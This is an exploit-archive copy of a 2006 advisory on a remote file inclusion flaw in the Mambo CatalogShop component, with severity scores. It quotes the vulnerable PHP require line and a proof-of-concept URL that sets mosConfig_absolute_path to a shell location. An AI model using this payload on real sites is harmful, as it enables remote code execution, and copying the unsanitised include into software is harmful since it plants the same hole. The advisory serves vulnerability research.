Mambo CatalogShop Remote File Inclusion

CVE	Category	Price	Severity
N/A	CWE-22	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2006-09-02

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N	0.015612	0.30107

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080142

Below is a copy:

		########################################################################
###################

#			Aria-Security.net Advisory                                        #

#			Discovered  by: O.U.T.L.A.W                                       #			#			< www.Aria-security.net >                                      	  #

#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #

#		                                  		    			  #

########################################################################
###################

#Software: Mambo CatalogShop

#Attack method: Remote File Inclusion

#Descriptio : This is a modified version of the FacileForms mambot, which allows you to add and view user comments and ratings below content in the categories setup in xtdratings. Just publish it!

#Source:

# Variables - Don't change anything here!!!

require($mosConfig_absolute_path."/administrator/components/com_catalogs
hop/config.catalogshop.php");

************************************************************************
************

#Proof of Concept:

#http://www.site.com/catalogshop.php?mosConfig_absolute_path=shell

#

#----------------------------------------------------------

#

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum